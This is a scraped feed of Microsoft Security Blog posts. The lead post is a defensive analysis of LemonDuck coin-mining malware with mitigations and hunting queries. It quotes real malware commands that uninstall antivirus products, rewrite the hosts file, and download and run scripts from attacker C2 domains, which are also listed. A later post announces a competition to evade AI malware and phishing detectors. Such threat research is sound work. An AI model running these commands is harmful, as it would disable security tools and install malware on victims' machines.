Microsoft

When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks

Microsoft Malware Protection Center - Thu, 07/29/2021 - 3:00pm

[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. Part 1 covered the evolution of the threat, how it spreads, and how it impacts organizations. Part 2 provides a deep dive on the attacker behavior and outlines investigation guidance.]

LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. As we discussed in Part 1 of this blog series, in recent months LemonDuck adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.

LemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns. After installation, LemonDuck can generally be identified by a predictable series of automated activities, followed by beacon check-in and monetization behaviors, and then, in some environments, human-operated actions.

In this blog post, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general and automatic behavior, as well as human-operated actions. We also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks.

Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures

External or human-initialized behavior

LemonDuck activity initiated from external applications – as against self-spreading methods like malicious phishing mail – is generally much more likely to begin with or lead to human-operated activity. These activities always result in more invasive secondary malware being delivered in tandem with persistent access being maintained through backdoors. These human-operated activities result in greater impact than standard infections.

In March and April 2021, various vulnerabilities related to the ProxyLogon set of Microsoft Exchange Server exploits were utilized by LemonDuck to install web shells and gain access to outdated systems. Attackers then used this access to launch additional attacks while also deploying automatic LemonDuck components and malware.

In some cases, the LemonDuck attackers used renamed copies of the official Microsoft Exchange On-Premises Mitigation Tool to remediate the vulnerability they had used to gain access. They did so while maintaining full access to compromised devices and limiting other actors from abusing the same Exchange vulnerabilities.

This self-patching behavior is in keeping with the attackers’ general desire to remove competing malware and risks from the device. This allows them to limit visibility of the attack to SOC analysts within an organization who might be prioritizing unpatched devices for investigation, or who would overlook devices that do not have a high volume of malware present.

The LemonDuck operators also make use of many fileless malware techniques, which can make remediation more difficult. Fileless techniques, which include persistence via registry, scheduled tasks, WMI, and startup folder, remove the need for stable malware presence in the filesystem. These techniques also include utilizing process injection and in-memory execution, which can make removal non-trivial. It is therefore imperative that organizations that were vulnerable in the past also direct action to investigate exactly how patching occurred, and whether malicious activity persists.

On the basic side of implementation this can mean registry, scheduled task, WMI and startup folder persistence to remove the necessity for stable malware presence in the filesystem. However, many free or easily available RATs and Trojans are now routinely utilizing process injection and in-memory execution to circumvent easy removal. To rival these kinds of behaviors it’s imperative that security teams within organizations review their incident response and malware removal processes to include all common areas and arenas of the operating system where malware may continue to reside after cleanup by an antivirus solution.

General, automatic behavior

If the initial execution begins automatically or from self-spreading methods, it typically originates from a file called Readme.js. This behavior could change over time, as the purpose of this .js file is to obfuscate and launch the PowerShell script that pulls additional scripts from the C2. This JavaScript launches a CMD process that subsequently launches Notepad as well as the PowerShell script contained within the JavaScript.

In contrast, if infection begins with RDP brute force, Exchange vulnerabilities, or other vulnerable edge systems, the first few actions are typically human-operated or originate from a hijacked process rather than from Readme.js. After this, the next few actions that the attackers take, including the scheduled task creation,  as well as the individual components and scripts are generally the same.

One of these actions is to establish fileless persistence by creating scheduled tasks that re-run the initial PowerShell download script. This script pulls its various components from the C2s at regular intervals. The script then checks to see if any portions of the malware were removed and re-enables them. LemonDuck also maintains a backup persistence mechanism through WMI Event Consumers to perform the same actions.

To host their scripts, the attackers use multiple hosting sites, which as mentioned are resilient to takedown. They also have multiple scheduled tasks to try each site, as well as the WMI events in case other methods fail. If all of those fail, LemonDuck also uses its access methods such as RDP, Exchange web shells, Screen Connect, and RATs to maintain persistent access. These task names can vary over time, but “blackball”, “blutea”, and “rtsa” have been persistent throughout 2020 and 2021 and are still seen in new infections as of this report.

LemonDuck attempts to automatically disable Microsoft Defender for Endpoint real-time monitoring and adds whole disk drives –  specifically the C:\ drive – to the Microsoft Defender exclusion list. This action could in effect disable Microsoft Defender for Endpoint, freeing the attacker to perform other actions. Tamper protection prevents these actions, but it’s important for organizations to monitor this behavior in cases where individual users set their own exclusion policy.

LemonDuck then attempts to automatically remove a series of other security products through CMD.exe, leveraging WMIC.exe. The products that we have observed LemonDuck remove include ESET, Kaspersky, Avast, Norton Security, and MalwareBytes. However, they also attempt to uninstall any product with “Security” and “AntiVirus” in the name by running the following commands:

cmd /c start /b wmic.exe product where “name like ‘%Security%’” call uninstall /
nointeractive
cmd /c start /b wmic.exe product where “name like ‘%AntiVirus%’” call uninstall /
nointeractive

Custom detections in Microsoft Defender for Endpoint or other security solutions can raise alerts on behaviors indicating interactions with security products that are not deployed in the environment. These alerts can allow the quick isolation of devices where this behavior is observed. While this uninstallation behavior is common in other malware, when observed in conjunction with other LemonDuck TTPs, this behavior can help validate LemonDuck infections.

LemonDuck leverages a wide range of free and open-source penetration testing tools. It also uses freely available exploits and functionality such as coin mining. Because of this, the order and the number of times the next few activities are run can change. The attackers can also change the threat’s presence slightly depending on the version, the method of infection, and timeframe. Many .exe and .bin files are downloaded from C2s via encoded PowerShell commands. These domains use a variety names such as the following:

  • ackng[.]com
  • bb3u9[.]com
  • ttr3p[.]com
  • zz3r0[.]com
  • sqlnetcat[.]com
  • netcatkit[.]com
  • hwqloan[.]com
  • 75[.]ag
  • js88[.]ag
  • qq8[.]ag

In addition to directly calling the C2s for downloads through scheduled tasks and PowerShell, LemonDuck exhibits another unique behavior: the IP addresses of a smaller subset of C2s are calculated and paired with a previously randomly generated and non-real domain name. This information is then added into the Windows Hosts file to avoid detection by static signatures. In instances where this method is seen, there is a routine to update this once every 24 hours. An example of this is below:

powershell.EXE -c "$Lemon_Duck='\g0B4wCb';$x='ASTJK'+'KV7n3F.cn';[Net.Dns]::GetHostAddresses('t.tr2'+'q.com')[0].IPAddressToString+' '+$x|out-file -"encoding" as`ci`i c:\windows\system32\drivers\etc\hosts;$y='http://'+$x+'/w.js';$z=$y+'p';$m=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($y);[System.Security.Cryptography.MD5]::Create().ComputeHash($m)|foreach{$s+=$_.ToString('x2')};if($s-eq'a49add2a8eeb7e89b9d743c0af0e1443'){IEX(-join[char[]]$m)}"

LemonDuck is known to use custom executables and scripts. It also renames and packages well-known tools such as XMRig and Mimikatz. Of these, the three most common are the following, though other packages and binaries have been seen as well, including many with .ori file extensions:

  • IF.BIN (used for lateral movement and privilege escalation)
  • KR.BIN (used for competition removal and host patching)
  • M[0-9]{1}[A-Z]{1}.BIN, M6.BIN, M6.BIN.EXE, or M6G.Bin (used for mining)

Executables used throughout the infection also use random file names sourced from the initiating script, which selects random characters, as evident in the following code:

$ename=-join([char[]](48..57+65..90+97..122)|Get-Random -Count (6+(Get-Random)%6)) + ".exe"

Lateral movement and privilege escalation

IF.Bin, whose name stands for “Infection”, is the most common name used for the infection script during the download process. LemonDuck uses this script at installation and then repeatedly thereafter to attempt to scan for ports and perform network reconnaissance. It then attempts to log onto adjacent devices to push the initial LemonDuck execution scripts.

IF.Bin attempts to move laterally via any additional attached drives. When drives are identified, they are checked to ensure that they aren’t already infected. If they aren’t, a copy of Readme.js, as well as subcomponents of IF.Bin, are downloaded into the drive’s home directory as hidden.

Similarly, IF.Bin attempts to brute force and use vulnerabilities for SMB, SQL, and other services to move laterally. It then immediately contacts the C2 for downloads.

Another tool dropped and utilized within this lateral movement component is a bundled Mimikatz, within a mimi.dat file associated with both the “Cat” and “Duck” infrastructures. This tool’s function is to facilitate credential theft for additional actions. In conjunction with credential theft, IF.Bin drops additional .BIN files to attempt common service exploits like CVE-2017-8464 (LNK remote code execution vulnerability) to increase privilege.

The attackers regularly update the internal infection components that the malware scans for. They then attempt brute force or spray attacks, as well as exploits against available SSH, MSSQL, SMB, Exchange, RDP, REDIS and Hadoop YARN for Linux and Windows systems. A sample of ports that recent LemonDuck infections were observed querying include 70001, 8088, 16379, 6379, 22, 445, and 1433.

Other functions built in and updated in this lateral movement component include mail self-spreading. This spreading functionality evaluates whether a compromised device has Outlook. If so, it accesses the mailbox and scans for all available contacts. It sends the initiating infecting file as part of a .zip, .js, or .doc/.rtf file with a static set of subjects and bodies. The mail metadata count of contacts is also sent to the attacker, likely to evaluate its effectiveness, such as in the following command:

(New-object net.webclient).downloadstring("DOWN_URL/report.json?type=mail&u=$muser&c1="+$contacts.count+"&c2="+$sent_tos.count+"&c3="+$recv_froms.count)

Competition removal and host patching

At installation and repeatedly afterward, LemonDuck takes great lengths to remove all other botnets, miners, and competitor malware from the device. It does this via KR.Bin, the “Killer” script, which gets its name from its function calls. This script attempts to remove services, network connections, and other evidence from dozens of competitor malware via scheduled tasks. It also closes well-known mining ports and removes popular mining services to preserve system resources. The script even removes the mining service it intends to use and simply reinstalls it afterward with its own configuration.

This “Killer” script is likely a continuation of older scripts that were used by other botnets such as GhostMiner in 2018 and 2019. The older variants of the script were quite small in comparison, but they have since grown, with additional services added in 2020 and 2021. Presently, LemonDuck seems consistent in naming its variant KR.Bin. This process spares the scheduled tasks created by LemonDuck itself, including various PowerShell scripts as well as a task called “blackball”, “blutea”, or “rtsa”, which has been in use by all LemonDuck’s infrastructures for the last year along with other task names.

The attackers were also observed manually re-entering an environment, especially in instances where edge vulnerabilities were used as an initial entry vector. The attackers also patch the vulnerability they used to enter the network to prevent other attackers from gaining entry. As mentioned, the attackers were seen using a copy of a Microsoft-provided mitigation tool for Exchange ProxyLogon vulnerability, which they hosted on their infrastructure, to ensure other attackers don’t gain web shell access the way they had. If unmonitored, this scenario could potentially lead to a situation where, if a system does not appear to be in an unpatched state, suspicious activity that occurred before patching could be ignored or thought to be unrelated to the vulnerability.

Weaponization and continued impact

A miner implant is downloaded as part of the monetization mechanism of LemonDuck. The implant used is usually XMRig, which is a favorite of GhostMiner malware, the Phorpiex botnet, and other malware operators. The file uses any of the following names:

  • M6.bin
  • M6.bin.ori
  • M6G.bin
  • M6.bin.exe
  • <File name that follows the regex pattern M[0-9]{1}[A-Z]{1}>.BIN.

Once the automated behaviors are complete, the threat goes into a consistent check-in behavior, simply mining and reporting out to the C2 infrastructure and mining pools as needed with encoded PowerShell commands such as those below (decoded):

cmd.EXE /c "set A=power& call %A%shell -ep bypass -e $Lemon_Duck='MicroSoft\Windows\FtLSO\nKOlou';$y='http://t.amxny.com/v.js';$z=$y+'p'+'?ipc_ "';$m=(New-Object System.Net.WebClient).DownloadData($y);[System.Security.Cryptography.MD5]::Create().ComputeHash($m)|foreach{$s+=$_.ToString('x2')};if($s-eq'Øœì

Qq›æôö{;~Á'){IEX(-join[char[]]$m)}"

Other systems that are affected bring in secondary payloads such as Ramnit, which is a very popular Trojan that has been seen being dropped by other malware in the past. Additional backdoors, other malware implants, and activities continuing long after initial infection, demonstrating that even a “simple” infection by a coin mining malware like LemonDuck can persist and bring in more dangerous threats to the enterprise.

Comprehensive protection against a wide-ranging malware operation

The cross-domain visibility and coordinated defense delivered by Microsoft 365 Defender is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Below we list mitigation actions, detection information, and advanced hunting queries that Microsoft 365 Defender customers can use to harden networks against threats from LemonDuck and other malware operations.

Mitigations

Apply these mitigations to reduce the impact of LemonDuck. Check the recommendations card for the deployment status of monitored mitigations.

  • Prevent threats from arriving via removable storage devices by blocking these devices on sensitive endpoints. If you allow removable storage devices, you can minimize the risk by turning off autorun, enabling real-time antivirus protection, and blocking untrusted content. Learn about stopping threats from USB devices and other removable media.
  • Ensure that Linux and Windows devices are included in routine patching, and validate protection against the CVE-2019-0708, CVE-2017-0144, CVE-2017-8464, CVE-2020-0796, CVE-2021-26855, CVE-2021-26858, and CVE-2021-27065 vulnerabilities, as well as against brute-force attacks in popular services like SMB, SSH, RDP, SQL, and others.
  • Turn on PUA protection. Potentially unwanted applications (PUA) can negatively impact machine performance and employee productivity. In enterprise environments, PUA protection can stop adware, torrent downloaders, and coin miners.
  • Turn on tamper protection featuresto prevent attackers from stopping security services.
  • Turn on cloud-delivered protectionand automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.
  • Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware. Turn on network protectionto block connections to malicious domains and IP addresses.
  • Check your Office 365 antispam policyand your mail flow rules for allowed senders, domains and IP addresses. Apply extra caution when using these settings to bypass antispam filters, even if the allowed sender addresses are associated with trusted organizations—Office 365 will honor these settings and can let potentially harmful messages pass through. Review system overrides in threat explorer to determine why attack messages have reached recipient mailboxes.
Attack surface reduction

Turn on the following attack surface reduction rules, to block or audit activity associated with this threat:

Antivirus detections

Microsoft Defender Antivirus detects threat components as the following malware:

  • TrojanDownloader:PowerShell/LemonDuck!MSR
  • TrojanDownloader:Linux/LemonDuck.G!MSR
  • Trojan:Win32/LemonDuck.A
  • Trojan:PowerShell/LemonDuck.A
  • Trojan:PowerShell/LemonDuck.B
  • Trojan:PowerShell/LemonDuck.C
  • Trojan:PowerShell/LemonDuck.D
  • Trojan:PowerShell/LemonDuck.E
  • Trojan:PowerShell/LemonDuck.F
  • Trojan:PowerShell/LemonDuck.G
  • TrojanDownloader:PowerShell/LodPey.A
  • TrojanDownloader:PowerShell/LodPey.B
  • Trojan:PowerShell/Amynex.A
  • Trojan:Win32/Amynex.A
Endpoint detection and response (EDR) alerts

Alerts with the following titles in the security center can indicate threat activity on your network:

  • LemonDuck botnet C2 domain activity
  • LemonDuck malware

The following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.

  • Suspicious PowerShell command line
  • Suspicious remote activity
  • Suspicious service registration
  • Suspicious Security Software Discovery
  • Suspicious System Network Configuration Discovery
  • Suspicious sequence of exploration activities
  • Suspicious Process Discovery
  • Suspicious System Owner/User Discovery
  • Suspicious System Network Connections Discovery
  • Suspicious Task Scheduler activity
  • Suspicious Microsoft Defender Antivirus exclusion
  • Suspicious behavior by cmd.exe was observed
  • Suspicious remote PowerShell execution
  • Suspicious behavior by svchost.exe was observed
  • A WMI event filter was bound to a suspicious event consumer
  • Attempt to hide use of dual-purpose tool
  • System executable renamed and launched
  • Microsoft Defender Antivirus protection turned off
  • Anomaly detected in ASEP registry
  • A script with suspicious content was observed
  • An obfuscated command line sequence was identified
  • A process was injected with potentially malicious code
  • A malicious PowerShell Cmdlet was invoked on the machine
  • Suspected credential theft activity
  • Outbound connection to non-standard port
  • Sensitive credential memory read
Advanced hunting

The LemonDuck botnet is highly varied in its payloads and delivery methods after email distribution so can sometimes evade alerts. You can use the advanced hunting capability in Microsoft 365 Defender and Microsoft Defender for Endpoint to surface activities associated with this threat.

NOTE: The following sample queries lets you search for a week’s worth of events. To explore up to 30 days worth of raw data to inspect events in your network and locate potential Lemon Duck-related indicators for more than a week, go to the Advanced Hunting page > Query tab, select the calendar drop-down menu to update your query to hunt for the Last 30 days.

LemonDuck template subject lines

Looks for subject lines that are present from 2020 to 2021 in dropped scripts that attach malicious LemonDuck samples to emails and mail it to contacts of the mailboxes on impacted machines. Additionally, checks if Attachments are present in the mailbox. General attachment types to check for at present are .DOC, .ZIP or .JS, though this could be subject to change as well as the subjects themselves. Run query in Microsoft 365 security center.

EmailEvents
| where Subject in ('The Truth of COVID-19','COVID-19 nCov Special info WHO','HALTH ADVISORY:CORONA VIRUS',
'WTF','What the fcuk','good bye','farewell letter','broken file','This is your order?')
| where AttachmentCount >= 1

LemonDuck Botnet Registration Functions

Looks for instances of function runs with name “SIEX”, which within the Lemon Duck initializing scripts is used to assign a specific user-agent for reporting back to command-and-control infrastructure with. This query should be accompanied by additional surrounding logs showing successful downloads from component sites. Run query in Microsfot 365 security center.

DeviceEvents
| where ActionType == "PowerShellCommand"
| where AdditionalFields =~ "{\"Command\":\"SIEX\"}"

LemonDuck keyword identification

Looks for simple usage of LemonDuck seen keyword variations initiated by PowerShell processes. All results should reflect Lemon_Duck behavior, however there are existing variants of Lemon_Duck that might not use this term explicitly, so validate with additional hunting queries based on known TTPs. Run query in Microsoft 365 security center.

DeviceProcessEvents
| where InitiatingProcessFileName == "powershell.exe"
| where InitiatingProcessCommandLine has_any("Lemon_Duck","LemonDuck")

LemonDuck Microsoft Defender tampering

Looks for a command line event where LemonDuck or other like malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. Run query in Microsoft 365 security center.

DeviceProcessEvents
| where InitiatingProcessCommandLine has_all ("Set-MpPreference", "DisableRealtimeMonitoring", "Add-MpPreference", "ExclusionProcess")
| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp

Antivirus uninstallation attempts

Looks for a command line event where LemonDuck or other similar malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. Run query in Microsoft 365 security center.

DeviceProcessEvents
| where InitiatingProcessFileName =~ "wmic.exe"
| where InitiatingProcessCommandLine has_all("product where","name like","call uninstall","/nointeractive")
| where InitiatingProcessCommandLine has_any("Kaspersky","avast","avp","security","eset","AntiVirus","Norton Security")

Known LemonDuck component script installations

Looks for instances of the callback actions which attempt to obfuscate detection while downloading supporting scripts such as those that enable the “Killer” and “Infection” functions for the malware as well as the mining components and potential secondary functions. Options for more specific instances included to account for environments with potential false positives. Most general versions are intended to account for minor script or component changes such as changing to utilize non .bin files, and non-common components. Run query in Microsoft 365 security center.

DeviceProcessEvents
| where InitiatingProcessFileName in ("powershell.exe","cmd.exe")
| where InitiatingProcessCommandLine has_all("/c echo try","down_url=","md5","downloaddata","ComputeHash") or
InitiatingProcessCommandLine has_all("/c echo try","down_url=","md5","downloaddata","ComputeHash",".bin") or
InitiatingProcessCommandLine has_all("/c echo try","down_url=","md5","downloaddata","ComputeHash","kr.bin","if.bin","m6.bin")

LemonDuck named scheduled creation

Looks for instances of the LemonDuck creates statically named scheduled tasks or a semi-unique pattern of task creation LemonDuck also utilizes launching hidden PowerShell processes in conjunction with randomly generated task names. An example of a randomly generated one is: “schtasks.exe” /create /ru system /sc MINUTE /mo 60 /tn fs5yDs9ArkV\2IVLzNXfZV/F /tr “powershell -w hidden -c PS_CMD”.  Run query in Microsoft 365 security center.

DeviceProcessEvents
| where FileName =~ "schtasks.exe"
| where ProcessCommandLine has("/create")
| where ProcessCommandLine has_any("/tn blackball","/tn blutea","/tn rtsa") or
ProcessCommandLine has_all("/create","/ru","system","/sc","/mo","/tn","/F","/tr","powershell -w hidden -c PS_CMD")

Competition killer script scheduled task execution

Looks for instances of the LemonDuck component KR.Bin, which is intended to kill competition prior to making the installation and persistence of the malware concrete. The killer script used is based off historical versions from 2018 and earlier, which has grown over time to include scheduled task and service names of various botnets, malware, and other competing services. The version currently in use by LemonDuck has approximately 40-60 scheduled task names. The upper maximum in this query can be modified and adjusted to include time bounding. Run query in Microsoft 365 security center.

DeviceProcessEvents
| where ProcessCommandLine has_all("schtasks.exe","/Delete","/TN","/F")
| summarize make_set(ProcessCommandLine) by DeviceId
| extend DeleteVolume = array_length(set_ProcessCommandLine)
| where set_ProcessCommandLine has_any("Mysa","Sorry","Oracle Java Update","ok") where DeleteVolume >= 40 and DeleteVolume <= 80

LemonDuck hosts file adjustment for dynamic C2 downloads

Looks for a PowerShell event wherein LemonDuck will attempt to simultaneously retrieve the IP address of a C2 and modify the hosts file with the retrieved address. The address is then attributed to a name that does not exist and is randomly generated. The script then instructs the machine to download data from the address. This query has a more general and more specific version, allowing the detection of this technique if other activity groups were to utilize it. Run query in Microsoft 365 security center.

DeviceProcessEvents
| where InitiatingProcessFileName == "powershell.exe"
| where InitiatingProcessCommandLine has_all("GetHostAddresses","etc","hosts")
or InitiatingProcessCommandLine has_all("GetHostAddresses","IPAddressToString","etc","hosts","DownloadData")

 

Learn how your organization can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365.

 

The post When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks appeared first on Microsoft Security Blog.

Categories: Microsoft

Attack AI systems in Machine Learning Evasion Competition

Microsoft Malware Protection Center - Thu, 07/29/2021 - 12:00pm

Today, we are launching MLSEC.IO, an educational Machine Learning Security Evasion Competition (MLSEC) for the AI and security communities to exercise their muscle to attack critical AI systems in a realistic setting. Hosted and sponsored by Microsoft, alongside NVIDIA, CUJO AI, VM-Ray, and MRG Effitas, the competition rewards participants who efficiently evade AI-based malware detectors and AI-based phishing detectors.

Machine learning powers critical applications in virtually every industry: finance, healthcare, infrastructure, and cybersecurity. Microsoft is seeing an uptick of attacks on commercial AI systems that could compromise the confidentiality, integrity, and availability guarantees of these systems. Publicly known cases documented by MITRE’s ATLAS framework, show how with the proliferation of AI systems comes the increased risk that the machine learning powering these systems can be manipulated to achieve an adversary’s goals. While the risks are inherent in all deployed machine learning models, the threat is especially explicit in cybersecurity, where machine learning models are increasingly relied on to detect threat actors’ tools and behaviors. Market surveys have consistently indicated that the security and privacy of AI systems are top concerns for executives. According to CCS Insight’s survey of 700 senior IT leaders in 2020, security is now the biggest hurdle companies face with AI, cited by over 30 percent of respondents1.

However, security practitioners are unaware of how to clear this new hurdle. A recent Microsoft survey found that 25 out of 28 organizations did not have the right tools in place to secure their AI systems. While academic researchers have been studying how to attack AI systems for close to two decades, awareness among practitioners is low. That is why one recommendation for business leaders from the 2021 Gartner report Top 5 Priorities for Managing AI Risk Within Gartner’s MOST Framework published2 is that organizations “Drive staff awareness across the organization by leading a formal AI risk education campaign.”

It is critical to democratize the knowledge to secure AI systems. That is why Microsoft recently released Counterfit, a tool born out of our own need to assess Microsoft’s AI systems for vulnerabilities with the goal of proactively securing AI services. For those new to adversarial machine learning, NVIDIA released MINTNV, a hack-the-box style environment to explore and build their skills.

Participate in MLSEC.IO

With the launch today of MLSEC.IO, we aim to highlight how security models can be evaded by motivated attackers and allow practitioners to exercise their muscles attacking critical machine learning systems used in cybersecurity.

“There is a lack of practical knowledge about securing or attacking AI systems in the security community. Competitions like Microsoft’s MSLEC democratizes adversarial machine learning knowledge for the offensive and defensive security communities, as well as the machine learning community. MLSEC’s hands-on approach is an exciting entry point into AML.”—Christopher Cottrell, AI Red Team Lead, NVIDIA

The competition involves two challenges beginning on August 6 and ending on September 17, 2021: an Anti-Malware Evasion track and an Anti-Phishing Evasion track.

  1. Anti-Phishing Evasion Track: Machine learning is routinely used to detect a highly successful attacker technique for gaining initial via phishing. In this track, contestants play the role of an attacker and attempt to evade a suite of anti-phishing models. Custom built by CUJO AI, the phishing machine learning models are purpose-built for this competition only.
  2. Anti-Malware Evasion track: This challenge provides an alternative scenario for attackers wishing to bypass machine-learning-based antivirus: change an existing malicious binary in a way that disguises it from the antimalware model.

In addition, for each of the Attacker Challenge tracks, the highest-scoring submission that extends and leverages Counterfit—Microsoft’s open-source tool for investigating the security of machine learning modelswill be awarded a bonus prize.

“The security evasion challenge creates new pathways into cybersecurity and opens up access for a broader base of talent. This year, to lower barriers to entry, we are introducing the phishing challenge, while still strongly encouraging people without significant experience in malware to participate.”—Zoltan Balazs, Head of Vulnerability Research Lab at CUJO AI and cofounder of the competition.

Key details about the competition
  • The competition runs from August 6 to September 17, 2021. Registration will remain open throughout the duration of the competition.
  • Winners will be announced on October 27, 2021, and contacted via email.
  • Prizes for first place, honorable mentions, as well as a bonus prize will be awarded for each of the two tracks.
Learn More

To learn more about the 2021 Machine Learning Security Evasion Competition:

  • Register now to begin participating on August 6, 2021, to exercise your offensive security muscle.
  • Visit the Counterfit GitHub Repository to learn more about Counterfit.
  • If you are new to adversarial machine learning, practice attacking AI systems via NVIDIA’s MINTNV hack-the-box style challenge.

This competition is part of broader efforts at Microsoft to empower engineers to securely develop and deploy AI systems. We recommend using it alongside the following resources:

  • For security analysts to orient to threats against AI systems, Microsoft, in collaboration with MITRE, released an ATT&CK style AdvML Threat Matrix complete with case studies of attacks on production machine learning systems.
  • For security incident responders, we released our own bug bar to systematically triage attacks on machine learning systems.
  • For developers, we released threat modeling guidance specifically for machine learning systems.
  • For engineers and policymakers, Microsoft, in collaboration with Berkman Klein Center at Harvard University, released a taxonomy documenting various machine learning failure modes.

Register now to participate in the Machine Learning Security Evasion Competition that begins on August 6 and ends on September 17, 2021. Winners will be announced on October 27, 2021.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

 

1CCS Insight, Senior Leadership IT Investment Survey, Nick McQuire et. al, 18 August 2020.

2Gartner, Top 5 Priorities for Managing AI Risk Within Gartner’s MOST Framework, Avivah Litan, et al., 15 January 2021.

The post Attack AI systems in Machine Learning Evasion Competition appeared first on Microsoft Security Blog.

Categories: Microsoft

Microsoft at Black Hat 2021: Sessions, bug bounty updates, product news, and more

Microsoft Malware Protection Center - Thu, 07/29/2021 - 12:00pm

Black Hat USA 2021 is about understanding the needs of security professionals and meeting you where you are. With last year’s pandemic-related firefighting still fresh in our minds, this year’s event will provide a welcome respite to learn about cutting-edge security solutions, build our skillsets, and network with peers.

Microsoft Security is committed to helping you secure your entire digital estate with integrated, comprehensive protection—bridging the gaps to catch what others miss. We provide the leading AI, automation, and expertise that help you detect threats quickly, respond effectively, and fortify your security posture.​ As the world enters a new normal where seasoned security professionals are more needed than ever, we’re proud to share our experience and learn from you at the virtual Black Hat USA 2021.

Virtual Microsoft-sponsored sessions

The Emerging Cyber Threat Landscape

Date and time: Tuesday, August 3, 1:15 PM – 1:45 PM PT

Black Hat CISO summit virtual breakout

Speaker:

  • Ann Johnson, Corporate Vice President, Security, Compliance, and Identity Business Development, Microsoft

The rapid rise of ransomware can be traced to WannaCry and (Not)Petya, which fused large-scale compromise techniques with an encryption payload that demanded a ransom payment in exchange for the decryption key. These successful attacks inspired a new generation of human-operated ransomware, expanding into an enterprise-scale operation blending targeted attacks and extortion. Learn how the rise in ransomware is influencing cyber strategies that can help strengthen your security posture.

Evolving Red Teaming at Microsoft

Date and time: Wednesday, August 4, 8 AM to 8:15 AM PT

Track: Security Operations and Incident Response

Speakers:

  • Alexandre Fernandes Costa, Principal Security Engineer Lead
  • Reid Borsuk, Principal Security Engineer

Representatives from one of the six teams dedicated to offensive security at Microsoft share how we’ve evolved from red teaming to broader offensive security practices and techniques. They’ll walk you through our collaborative approach to offensive security operations, all while demonstrating how red team activity is reflected in our products designed to stop adversaries in their tracks.

Preventing a Hostage Situation: Defusing the Pervasive Threat of Human-Operated Ransomware

Date and time: Wednesday, August 4, 3:10 PM – 3:30 PM PT

Track: Endpoint Security

Speakers:

  • Hadar Feldman, Product Management Lead, Microsoft 365 Defender
  • Itai Kollmann Dekel, Principal Research Manager, Microsoft Defender for Endpoint

Ransomware has evolved. We’ve all seen it progress from automated, indiscriminate nuisance attacks into the targeted, human-operated campaigns that cost businesses millions. Protecting against a ransomware attack is like preventing a hostage situation in real life—you need to understand the nature of the threat, assess your exposure to risk, identify high-value assets, implement protective measures, and have playbooks ready to respond rapidly.

In this session, we’ll take you through crisis prevention and mitigation strategies that can be a game-changer against human-operated ransomware. You’ll learn about our latest research on the ransomware threat landscape, based on in-depth analysis of dozens of real-world ransom attacks in the past year. We’ll examine how human-operated ransomware attacks have become more like advanced persistent threats, and what that means for your organization. We’ll discuss key mitigations that address common techniques observed in ransomware campaigns (like tampering with security products). Finally, we’ll examine approaches to contain aggressive ransomware along with critical ways to improve your ability to see through the noise—before it’s too late.

Inside the Most Impactful Nation-State Attack in History

Date and time: Thursday, August 5, 2:10 PM – 2:30 PM PT

Track: Security Operations and Incident Response

Speakers:

  • Elia Florio, Principal Research Lead, Microsoft
  • Ramin Nafisi, Senior Malware Reverse Engineer, Microsoft
  • Dana Baril, Senior Security Research Lead, Microsoft
  • Michael Grenetz, Senior Product Manager, Microsoft

Get an inside look into one of the most sophisticated attacks in history—the Nobelium incident—from the frontline responders that helped track and defend against it. We’ll discuss the adversary’s tradecraft, novel techniques, and expert recommendations that can help organizations protect themselves from the next wave of advanced threats.

Microsoft Bug Bounty Program

Microsoft awarded $13.6 million in bug bounties to more than 340 security researchers in 58 countries during the past 12 months. Bounties averaged more than $10,000 per award across all programs, with the largest ($200,000) awarded under the Hyper-V Bounty Program. The more than 1,200 eligible reports we received over the past year reflect the talent of the global security research community, as well as the spirit of partnership Microsoft fosters in addressing the challenges of a rapidly evolving threat landscape.

Bug bounty and research programs—new and updated

A heartfelt thank you goes out to everyone who shared their research with Microsoft over the past year. We look forward to sharing more Bug Bounty Program improvements with you in the coming year, as we continue to invest in our partnerships within the security research community.

Machine Learning Evasion Competition

Microsoft is seeing an uptick of attacks on commercial AI systems that could compromise the confidentiality, integrity, and availability guarantees of these systems. To help the AI and security community ramp up on this novel space, and provide a learning environment, today, we are launching MLSEC.IO, an educational Machine Learning Security Evasion Competition (MLSEC). Learn more about the competition and how to participate from our announcement blog.

Microsoft Security product news Microsoft Azure Sentinel

In March 2021, Microsoft announced an important step in realizing our vision for integrated SIEM and XDR with the release of incidents integration between Azure Sentinel and Microsoft 365 Defender. Now, we’re excited to take another key step in this journey—bi-directional incidents syncing between Azure Defender and Azure Sentinel are now in public preview. With this capability, users can now automatically sync alerts, incidents, and incident statuses across the two products. Microsoft now delivers the only integrated SIEM and XDR with incident sharing across all components, streamlining the investigation process and giving your SecOps team more time to focus on what’s really important. Read  Microsoft Ignite 2021: What’s New in Azure Sentinel to learn more.

Microsoft Defender for Endpoint

